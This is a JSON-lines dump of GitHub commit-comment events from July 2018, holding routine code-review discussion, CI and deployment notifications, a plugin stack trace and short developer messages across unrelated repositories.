{"id":"7957059047","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687111,"position":null,"line":null,"path":null,"commit_id":"e50cca25fd3b48e457883138aa6d3a8585684516","created_at":"2018-07-12T15:37:56Z","updated_at":"2018-07-12T15:37:56Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-153755 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-153755\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:37:56Z"}
{"id":"7957062570","type":"CommitCommentEvent","actor":{"login":"ttaylorr"},"repo":{"name":"git/git-scm.com"},"payload":{"comment":{"id":29687116,"position":5,"line":82,"path":"lib/tasks/book2.rake","commit_id":"313dfb7d1890f5f9e52e7e6f51a268f20810f236","created_at":"2018-07-12T15:38:31Z","updated_at":"2018-07-12T15:38:31Z","author_association":"MEMBER","body":"It's not clear to me why we're bothering to assign `book =` here when we clobber it anyway in the next line."}},"created_at":"2018-07-12T15:38:31Z"}
{"id":"7957064579","type":"CommitCommentEvent","actor":{"login":"juhovh"},"repo":{"name":"notedit/AirPlay"},"payload":{"comment":{"id":29687117,"position":null,"line":null,"path":null,"commit_id":"b6311959c23df735206caa943b98dcc47967ed20","created_at":"2018-07-12T15:38:51Z","updated_at":"2018-07-12T15:38:51Z","author_association":"NONE","body":"你这是用别人的志愿工作和代码宣传你自己的产品而已，不酷"}},"created_at":"2018-07-12T15:38:51Z"}
{"id":"7957065398","type":"CommitCommentEvent","actor":{"login":"craigharvi3"},"repo":{"name":"bbc/webpack-s3-uploader"},"payload":{"comment":{"id":29687118,"position":4,"line":6,"path":"package.json","commit_id":"a9bcd3e7a71b420aac84b0d7466dd1e85757d26a","created_at":"2018-07-12T15:38:59Z","updated_at":"2018-07-12T15:38:59Z","author_association":"COLLABORATOR","body":"The entrypoint is to the compiled version though @spa-simone ?"}},"created_at":"2018-07-12T15:38:59Z"}
{"id":"7957067542","type":"CommitCommentEvent","actor":{"login":"symball"},"repo":{"name":"kagomema24/docker-images"},"payload":{"comment":{"id":29687121,"position":null,"line":null,"path":null,"commit_id":"3745b0b2fc4fef3ac40371b23b097d3cd3ee697e","created_at":"2018-07-12T15:39:20Z","updated_at":"2018-07-12T15:39:20Z","author_association":"NONE","body":"Hi Melody, good to see this still getting some use :D Let me know if you need a hand with anything"}},"created_at":"2018-07-12T15:39:20Z"}
{"id":"7957070703","type":"CommitCommentEvent","actor":{"login":"kirtimittal18"},"repo":{"name":"gupta-pratik/7-segement-invoice-parser"},"payload":{"comment":{"id":29687123,"position":null,"line":null,"path":null,"commit_id":"a5423d818c7ea77de59dedbc4b850eec94dca099","created_at":"2018-07-12T15:39:51Z","updated_at":"2018-07-12T15:39:51Z","author_association":"NONE","body":"Hi I am unable to run this project.\r\nCan you please help me ."}},"created_at":"2018-07-12T15:39:51Z"}
{"id":"7957071283","type":"CommitCommentEvent","actor":{"login":"peff"},"repo":{"name":"git/git-scm.com"},"payload":{"comment":{"id":29687126,"position":5,"line":82,"path":"lib/tasks/book2.rake","commit_id":"313dfb7d1890f5f9e52e7e6f51a268f20810f236","created_at":"2018-07-12T15:39:57Z","updated_at":"2018-07-12T15:39:57Z","author_association":"CONTRIBUTOR","body":"Heh, because I was adapting this from original code which did `book.destroy`, and eventually stopped seeing the `book = `."}},"created_at":"2018-07-12T15:39:57Z"}
{"id":"7957072309","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"RedPRL/redtt"},"payload":{"comment":{"id":29687130,"position":null,"line":null,"path":null,"commit_id":"895bc2e7a68221775d622b1e328c436724ddc80f","created_at":"2018-07-12T15:40:08Z","updated_at":"2018-07-12T15:40:08Z","author_association":"COLLABORATOR","body":"I'm not crazy about this,  could you explain why we want it? "}},"created_at":"2018-07-12T15:40:08Z"}
{"id":"7957077893","type":"CommitCommentEvent","actor":{"login":"4re"},"repo":{"name":"HomeOfVapourSynthEvolution/havsfunc"},"payload":{"comment":{"id":29687138,"position":null,"line":null,"path":null,"commit_id":"d58d68134934dfc49153116c4edc1ab46e333877","created_at":"2018-07-12T15:41:01Z","updated_at":"2018-07-12T15:41:01Z","author_association":"NONE","body":"I have r1 if that is of any use: https://www.dropbox.com/s/d72bougsis2se58/vapoursynth-depan-1.tar.gz?dl=0"}},"created_at":"2018-07-12T15:41:01Z"}
{"id":"7957078356","type":"CommitCommentEvent","actor":{"login":"jonsterling"},"repo":{"name":"RedPRL/redtt"},"payload":{"comment":{"id":29687139,"position":null,"line":null,"path":null,"commit_id":"895bc2e7a68221775d622b1e328c436724ddc80f","created_at":"2018-07-12T15:41:06Z","updated_at":"2018-07-12T15:41:06Z","author_association":"COLLABORATOR","body":"Ah it improves unification... My concern is that it will disrupt overloading, which we might add someday. Maybe not a big deal. "}},"created_at":"2018-07-12T15:41:06Z"}
{"id":"7957082047","type":"CommitCommentEvent","actor":{"login":"adamjson"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29687143,"position":null,"line":null,"path":null,"commit_id":"550cd0c54bd33fb3d5831c4f2844091e03d9a864","created_at":"2018-07-12T15:41:42Z","updated_at":"2018-07-12T15:41:42Z","author_association":"NONE","body":"I think setting retryOnConnectionFailure is going to mask any real issues, and may cause even more problems. This commit was made in an attempt to fix issue #6025, however the stacktrace in that ticket indicates that the problem happens during reading a response. For example, if a POST request (like clicking an element) succeeds server side, but reading the response fails for some reason and the POST is then retried, the element will be clicked twice, or fail to be clicked a second time and return an exception.\r\n\r\nhttps://medium.com/inloopx/okhttp-is-quietly-retrying-requests-is-your-api-ready-19489ef35ace"}},"created_at":"2018-07-12T15:41:42Z"}
{"id":"7957084120","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687144,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:42:01Z","updated_at":"2018-07-12T15:42:01Z","author_association":"MEMBER","body":"I have done two changes:\r\n\r\n1. I changed the theme. I think some of the changes you mentioned above probably came with the new theme (tango)\r\n\r\n2. And then I proceeded to remove most bolds and italics from there, always changing everything in a group consistently (i.e. always changing the whole group)\r\n\r\nIn any case, the reasoning for those changes is because most themes tend to bold keywords, which IMO put the emphasis in the wrong place. For example, if you have `def foo do`, with both `def` and `do` bolded, you won't be able to focus on the function name.\r\n\r\nI don't care much about the rest. I will be happy to accept improvements here, as long as we are putting the focus on what is necessary. :)"}},"created_at":"2018-07-12T15:42:01Z"}
{"id":"7957085834","type":"CommitCommentEvent","actor":{"login":"zarubaf"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29687147,"position":72,"line":136,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T15:42:18Z","updated_at":"2018-07-12T15:42:18Z","author_association":"MEMBER","body":"Okay, lets move it there then."}},"created_at":"2018-07-12T15:42:18Z"}
{"id":"7957086067","type":"CommitCommentEvent","actor":{"login":"favonia"},"repo":{"name":"RedPRL/redtt"},"payload":{"comment":{"id":29687148,"position":null,"line":null,"path":null,"commit_id":"895bc2e7a68221775d622b1e328c436724ddc80f","created_at":"2018-07-12T15:42:20Z","updated_at":"2018-07-12T15:42:20Z","author_association":"COLLABORATOR","body":"Well, I guess we can remove these when the time comes..."}},"created_at":"2018-07-12T15:42:20Z"}
{"id":"7957087169","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29687152,"position":null,"line":null,"path":null,"commit_id":"47881ab5459b824f53f6a6f90cef7346591de7a8","created_at":"2018-07-12T15:42:30Z","updated_at":"2018-07-12T15:42:30Z","author_association":"NONE","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - i386-Windows-7-VisualStudio-14: OK (3309 of 3309 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-47881ab5459b824f53f6a6f90cef7346591de7a8-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T15:42:30Z"}
{"id":"7957088720","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29687154,"position":null,"line":null,"path":null,"commit_id":"3b6950b65afa65d2b4d20590ac51fff24d1605a8","created_at":"2018-07-12T15:42:45Z","updated_at":"2018-07-12T15:42:45Z","author_association":"COLLABORATOR","body":"Oh yeah, the RCS clips badly. Looking inside the fairing there's no room for anything on the RCS mounts. The entire nozzle is buried in the interstage wall.\r\n\r\nI'll be updating soon with a new attach node position. Having it way down at -1.318 is no good."}},"created_at":"2018-07-12T15:42:45Z"}
{"id":"7957090285","type":"CommitCommentEvent","actor":{"login":"spa-simone"},"repo":{"name":"bbc/webpack-s3-uploader"},"payload":{"comment":{"id":29687155,"position":4,"line":6,"path":"package.json","commit_id":"a9bcd3e7a71b420aac84b0d7466dd1e85757d26a","created_at":"2018-07-12T15:43:01Z","updated_at":"2018-07-12T15:43:01Z","author_association":"MEMBER","body":"ES aware tools don't need the transpiled version, they can understand the src version. Another thing you can do if you don't want to point to the src folder, you can bundle up everything without transpilation, and still point in the `dist` folder. This time you should add an extension to distinguish from the transpiled version. Usually the default is `.esm.js` or `es.js`\r\n\r\nExample:\r\n```\r\n{\r\n  \"main\": \"dist/webpack-s3-uploader.js\",\r\n  \"module\": \"dist/webpack-s3-uploader.esm.js\"\r\n}\r\n```\r\n\r\nsee https://github.com/rollup/rollup/wiki/pkg.module"}},"created_at":"2018-07-12T15:43:01Z"}
{"id":"7957090938","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687156,"position":null,"line":null,"path":null,"commit_id":"edb5ba9e856652be319f8a7b0d47c1d511f59846","created_at":"2018-07-12T15:43:08Z","updated_at":"2018-07-12T15:43:08Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-154308 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-154308\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:43:08Z"}
{"id":"7957092884","type":"CommitCommentEvent","actor":{"login":"akakanslzk2"},"repo":{"name":"Runtym/ict_report"},"payload":{"comment":{"id":29687158,"position":null,"line":null,"path":null,"commit_id":"a301a02b6cb4edf5e7611e7d14bd0cc15c0921c2","created_at":"2018-07-12T15:43:27Z","updated_at":"2018-07-12T15:43:27Z","author_association":"COLLABORATOR","body":"312312"}},"created_at":"2018-07-12T15:43:27Z"}
{"id":"7957094130","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29687162,"position":null,"line":null,"path":null,"commit_id":"e8b11a340f39bef885d5e5ff28c5be3a81276807","created_at":"2018-07-12T15:43:39Z","updated_at":"2018-07-12T15:43:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-154337 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-154337\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:43:39Z"}
{"id":"7957095594","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29687165,"position":14,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/backend/parser.d","commit_id":"f443125fbc4ab8c68b7e92c0a92eed80bd8fa140","created_at":"2018-07-12T15:43:52Z","updated_at":"2018-07-12T15:43:52Z","author_association":"OWNER","body":"Intended to remove this line? I think it is covered by the splitter further down 😁"}},"created_at":"2018-07-12T15:43:52Z"}
{"id":"7957095766","type":"CommitCommentEvent","actor":{"login":"zarubaf"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29687166,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T15:43:54Z","updated_at":"2018-07-12T15:43:54Z","author_association":"MEMBER","body":"My feeling is that we should not leave too many choices in the guidelines. Also this does not comply with the idea of Verilog style of the bigger mass."}},"created_at":"2018-07-12T15:43:54Z"}
{"id":"7957096502","type":"CommitCommentEvent","actor":{"login":"LWSS"},"repo":{"name":"LWSS/Fuzion"},"payload":{"comment":{"id":29687169,"position":null,"line":null,"path":null,"commit_id":"5c952920765e518af23f7b712ccb06b393042c2d","created_at":"2018-07-12T15:44:01Z","updated_at":"2018-07-12T15:44:01Z","author_association":"OWNER","body":"This is for `-panorama` Go here for the last non-panorama version: ( https://github.com/LWSS/Fuzion/commit/3a675c8a5360a437699ff16393c56279db6afeed )\r\n\r\nclient_client.so was renamed to client_panorama_client.so, it is mostly the same.\r\n\r\nKnown broke features:\r\n- `rank reveal all`\r\n- `autoaccept`"}},"created_at":"2018-07-12T15:44:01Z"}
{"id":"7957097853","type":"CommitCommentEvent","actor":{"login":"stevekuznetsov"},"repo":{"name":"openshift/release"},"payload":{"comment":{"id":29687173,"position":null,"line":null,"path":null,"commit_id":"65027264446f1768ce6a63c14bbe88529541356b","created_at":"2018-07-12T15:44:15Z","updated_at":"2018-07-12T15:44:15Z","author_association":"CONTRIBUTOR","body":"@smarterclayton if you remove a job that was at some point required, you _MUST_ use `migratestatus` to remove any statuses that had been posted in the past or those PRs will not be able to merge."}},"created_at":"2018-07-12T15:44:15Z"}
{"id":"7957104705","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29687182,"position":7,"line":581,"path":"CaseStudies/glass/docs/SRS/glassbr_srs.tex","commit_id":"92672a859d8613018719e343a7a22597087230c7","created_at":"2018-07-12T15:45:24Z","updated_at":"2018-07-12T15:45:24Z","author_association":"OWNER","body":"Minor suggestion for @elwazana -- we can control inappropriate linebreaks in LaTeX using a tilde (~).  Between the word Section and \\ref, please put a tilde (for instance Section~\\ref{sec_theoretical}).  This will make sure that we don't have a newline between Section and the section number.  Not a big deal, but in the long run it makes the documents easier to maintain and more attractive.  😄 "}},"created_at":"2018-07-12T15:45:24Z"}
{"id":"7957105973","type":"CommitCommentEvent","actor":{"login":"zarubaf"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29687183,"position":24,"line":24,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T15:45:37Z","updated_at":"2018-07-12T15:45:37Z","author_association":"MEMBER","body":"Will check that, thanks for the pointer. The new notations is also what is most probably to come in the near future."}},"created_at":"2018-07-12T15:45:37Z"}
{"id":"7957106244","type":"CommitCommentEvent","actor":{"login":"teracube"},"repo":{"name":"QuiltedTuba2798/PocketMine-Plugins"},"payload":{"comment":{"id":29687184,"position":null,"line":null,"path":null,"commit_id":"c6fd05704c3510ecb923ef84e8f1613d940d8381","created_at":"2018-07-12T15:45:40Z","updated_at":"2018-07-12T15:45:40Z","author_association":"NONE","body":"\r\n```\r\n2018-07-12 [17:41:47] [Server thread/INFO]: Enabling CombatLogger v0.0.5\r\n2018-07-12 [17:41:47] [Server thread/CRITICAL]: Error: \"Call to undefined method pocketmine\\Server::getScheduler()\" (EXCEPTION) in \"CombatLogger_dev-1.phar/src/jacknoordhuis/combatlogger/CombatLogger\" at line 90\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #0 CombatLogger_dev-1.phar/src/jacknoordhuis/combatlogger/CombatLogger(46): jacknoordhuis\\combatlogger\\CombatLogger->startHeartbeat()\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #1 src/pocketmine/plugin/PluginBase(111): jacknoordhuis\\combatlogger\\CombatLogger->onEnable()\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #2 src/pocketmine/plugin/PluginManager(613): pocketmine\\plugin\\PluginBase->setEnabled(boolean 1)\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #3 src/pocketmine/Server(1937): pocketmine\\plugin\\PluginManager->enablePlugin(jacknoordhuis\\combatlogger\\CombatLogger object)\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #4 src/pocketmine/Server(1923): pocketmine\\Server->enablePlugin(jacknoordhuis\\combatlogger\\CombatLogger object)\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #5 src/pocketmine/Server(1717): pocketmine\\Server->enablePlugins(integer 1)\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #6 src/pocketmine/PocketMine(243): pocketmine\\Server->__construct(BaseClassLoader object, pocketmine\\utils\\MainLogger object, string /home/myservertest/, string /home/myservertest/plugins/)\r\n2018-07-12 [17:41:47] [Server thread/DEBUG]: #7 /home/myservertest/PocketMine-MP.phar(1): require(string phar:///home/myservertest/PocketMine-MP.phar/src/pocketmine/PocketMine.php)\r\n2018-07-12 [17:41:47] [Server thread/INFO]: Disabling CombatLogger v0.0.5\r\n```\r\n"}},"created_at":"2018-07-12T15:45:40Z"}
{"id":"7957106712","type":"CommitCommentEvent","actor":{"login":"spa-simone"},"repo":{"name":"bbc/webpack-s3-uploader"},"payload":{"comment":{"id":29687185,"position":4,"line":6,"path":"package.json","commit_id":"a9bcd3e7a71b420aac84b0d7466dd1e85757d26a","created_at":"2018-07-12T15:45:44Z","updated_at":"2018-07-12T15:45:44Z","author_association":"MEMBER","body":"The main benefit of the `module` is for libraries, but it doesn't hurt to have it in the package.json of this plugin. Worst case scenario is ignored."}},"created_at":"2018-07-12T15:45:44Z"}
{"id":"7957109602","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29687186,"position":null,"line":null,"path":null,"commit_id":"6184ec210007e74adf4b380b5fe8f9c6937a1700","created_at":"2018-07-12T15:46:13Z","updated_at":"2018-07-12T15:46:13Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4441)*\n"}},"created_at":"2018-07-12T15:46:13Z"}
{"id":"7957109751","type":"CommitCommentEvent","actor":{"login":"newtratip"},"repo":{"name":"pabi2/pb2_addons"},"payload":{"comment":{"id":29687187,"position":5,"line":53,"path":"pabi_account_report/reports/xlsx_report_gl_payable.py","commit_id":"16bdd2313150a8d4b0b3a11596dfb08c0fb4d893","created_at":"2018-07-12T15:46:15Z","updated_at":"2018-07-12T15:46:15Z","author_association":"CONTRIBUTOR","body":"เราไม่ได้ใช้ am.name ไม่ใช้หรอ ให้ลบออก"}},"created_at":"2018-07-12T15:46:15Z"}
{"id":"7957112097","type":"CommitCommentEvent","actor":{"login":"antonigarcia11"},"repo":{"name":"marcomarco2018/prueba9"},"payload":{"comment":{"id":29687190,"position":null,"line":null,"path":null,"commit_id":"346f4d0f3b5b496fe801cc5b08e753410510357c","created_at":"2018-07-12T15:46:38Z","updated_at":"2018-07-12T15:46:38Z","author_association":"COLLABORATOR","body":"Hola macó "}},"created_at":"2018-07-12T15:46:38Z"}
{"id":"7957112186","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29687191,"position":22,"line":84,"path":"core/src/test/java/tech/tablesaw/api/TableTest.java","commit_id":"ff46af2b84c35d064e16188d7f5c998c41988a0f","created_at":"2018-07-12T15:46:39Z","updated_at":"2018-07-12T15:46:39Z","author_association":"COLLABORATOR","body":"I'm getting a compilation warning that the variable `n` is unused. This test doesn't actually test anything now. Should probably add an assert here"}},"created_at":"2018-07-12T15:46:39Z"}
{"id":"7957114083","type":"CommitCommentEvent","actor":{"login":"asenathmiller"},"repo":{"name":"asenathmiller/datasciencecoursera"},"payload":{"comment":{"id":29687194,"position":null,"line":null,"path":null,"commit_id":"e4445a2e9674fc7475f5dd78695fbfc7fee5d6f3","created_at":"2018-07-12T15:47:00Z","updated_at":"2018-07-12T15:47:00Z","author_association":"OWNER","body":"## this is a markdown file"}},"created_at":"2018-07-12T15:47:00Z"}
{"id":"7957114882","type":"CommitCommentEvent","actor":{"login":"GaofengDong"},"repo":{"name":"GaofengDong/PRNG"},"payload":{"comment":{"id":29687199,"position":null,"line":null,"path":null,"commit_id":"4afc81406900b6ed5b537463881fe9618fe01c0d","created_at":"2018-07-12T15:47:09Z","updated_at":"2018-07-12T15:47:09Z","author_association":"OWNER","body":"A 7B5B54657374566563746F725D53475D\r\nH 48692853686179295B477565726F6E5D\r\nP 00000000000000000000000000000087\r\nX 040229A09A5ED12E7E4E10DA323506D2"}},"created_at":"2018-07-12T15:47:09Z"}
{"id":"7957115182","type":"CommitCommentEvent","actor":{"login":"stevekuznetsov"},"repo":{"name":"openshift/release"},"payload":{"comment":{"id":29687203,"position":null,"line":null,"path":null,"commit_id":"65027264446f1768ce6a63c14bbe88529541356b","created_at":"2018-07-12T15:47:11Z","updated_at":"2018-07-12T15:47:11Z","author_association":"CONTRIBUTOR","body":"For instance, here:\r\n\r\n```\r\nmigratestatus --tokenfile /tmp/token --org openshift --repo origin --move ci/openshift-jenkins/cross --dest ci/prow/cross\r\n```"}},"created_at":"2018-07-12T15:47:11Z"}
{"id":"7957117196","type":"CommitCommentEvent","actor":{"login":"tmbb"},"repo":{"name":"elixir-lang/ex_doc"},"payload":{"comment":{"id":29687208,"position":null,"line":null,"path":null,"commit_id":"35c023174a543090407392f4593db3304c6237a6","created_at":"2018-07-12T15:47:30Z","updated_at":"2018-07-12T15:47:30Z","author_association":"CONTRIBUTOR","body":"> I changed the theme. I think some of the changes you mentioned above probably came with the new theme (tango)\r\n\r\nI don't get it... The *old* theme was based on tango, but heavily customized. Did you replace my theme by *vanilla tango* or did you remove tango and replaced it by something else?\r\n\r\n> And then I proceeded to remove most bolds and italics from there, always changing everything in a group consistently (i.e. always changing the whole group)\r\n\r\nI don't oppose these changes. Only the ones I've written about earlier."}},"created_at":"2018-07-12T15:47:30Z"}
{"id":"7957119709","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29687212,"position":null,"line":null,"path":null,"commit_id":"de92f3491f59494f8941ae2df6730d125e47c305","created_at":"2018-07-12T15:47:54Z","updated_at":"2018-07-12T15:47:54Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-349](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-349).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-349-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T15:47:54Z"}
{"id":"7957119876","type":"CommitCommentEvent","actor":{"login":"BennettAChris"},"repo":{"name":"BennettAChris/Python"},"payload":{"comment":{"id":29687213,"position":null,"line":null,"path":null,"commit_id":"c2ae965c2a906efaf09c1b65ab2955745d0772a0","created_at":"2018-07-12T15:47:56Z","updated_at":"2018-07-12T15:47:56Z","author_association":"OWNER","body":"to change the Amount of health that is randomly chosen simply change the level of difficulty!"}},"created_at":"2018-07-12T15:47:56Z"}
{"id":"7957119908","type":"CommitCommentEvent","actor":{"login":"lwhite1"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29687214,"position":22,"line":84,"path":"core/src/test/java/tech/tablesaw/api/TableTest.java","commit_id":"ff46af2b84c35d064e16188d7f5c998c41988a0f","created_at":"2018-07-12T15:47:56Z","updated_at":"2018-07-12T15:47:56Z","author_association":"COLLABORATOR","body":"understood.\n\nOn Thu, Jul 12, 2018 at 11:46 AM Ben McCann <notifications@github.com>\nwrote:\n\n> I'm getting a compilation warning that the variable n is unused. This\n> test doesn't actually test anything now. Should probably add an assert here\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jtablesaw/tablesaw/commit/ff46af2b84c35d064e16188d7f5c998c41988a0f#commitcomment-29687191>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADRXgtjL7-Vs8Oyisv6C7yvexufXQAlpks5uF29hgaJpZM4VNRXR>\n> .\n>\n"}},"created_at":"2018-07-12T15:47:56Z"}
{"id":"7957121766","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29687218,"position":null,"line":null,"path":null,"commit_id":"ab8f96d5fba0db5c8175688f1d95f3af661f0024","created_at":"2018-07-12T15:48:13Z","updated_at":"2018-07-12T15:48:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-782](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-782).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-782-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-12T15:48:13Z"}
{"id":"7957124637","type":"CommitCommentEvent","actor":{"login":"tas50"},"repo":{"name":"chefspec/chefspec"},"payload":{"comment":{"id":29687225,"position":11,"line":24,"path":".travis.yml","commit_id":"b2afbc531492487084912ad40ce4ba307227e3ee","created_at":"2018-07-12T15:48:40Z","updated_at":"2018-07-12T15:48:40Z","author_association":"CONTRIBUTOR","body":"This is 2.4.4 as well"}},"created_at":"2018-07-12T15:48:40Z"}
{"id":"7957124716","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29687226,"position":null,"line":null,"path":null,"commit_id":"ba7a6230082547d12751a4ade4a08f4deb063c83","created_at":"2018-07-12T15:48:41Z","updated_at":"2018-07-12T15:48:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-154840 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-154840\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T15:48:41Z"}
{"id":"7957127880","type":"CommitCommentEvent","actor":{"login":"tas50"},"repo":{"name":"chefspec/chefspec"},"payload":{"comment":{"id":29687230,"position":22,"line":33,"path":".travis.yml","commit_id":"b2afbc531492487084912ad40ce4ba307227e3ee","created_at":"2018-07-12T15:49:11Z","updated_at":"2018-07-12T15:49:11Z","author_association":"CONTRIBUTOR","body":"13.5 and below should probably just go away at this point"}},"created_at":"2018-07-12T15:49:11Z"}
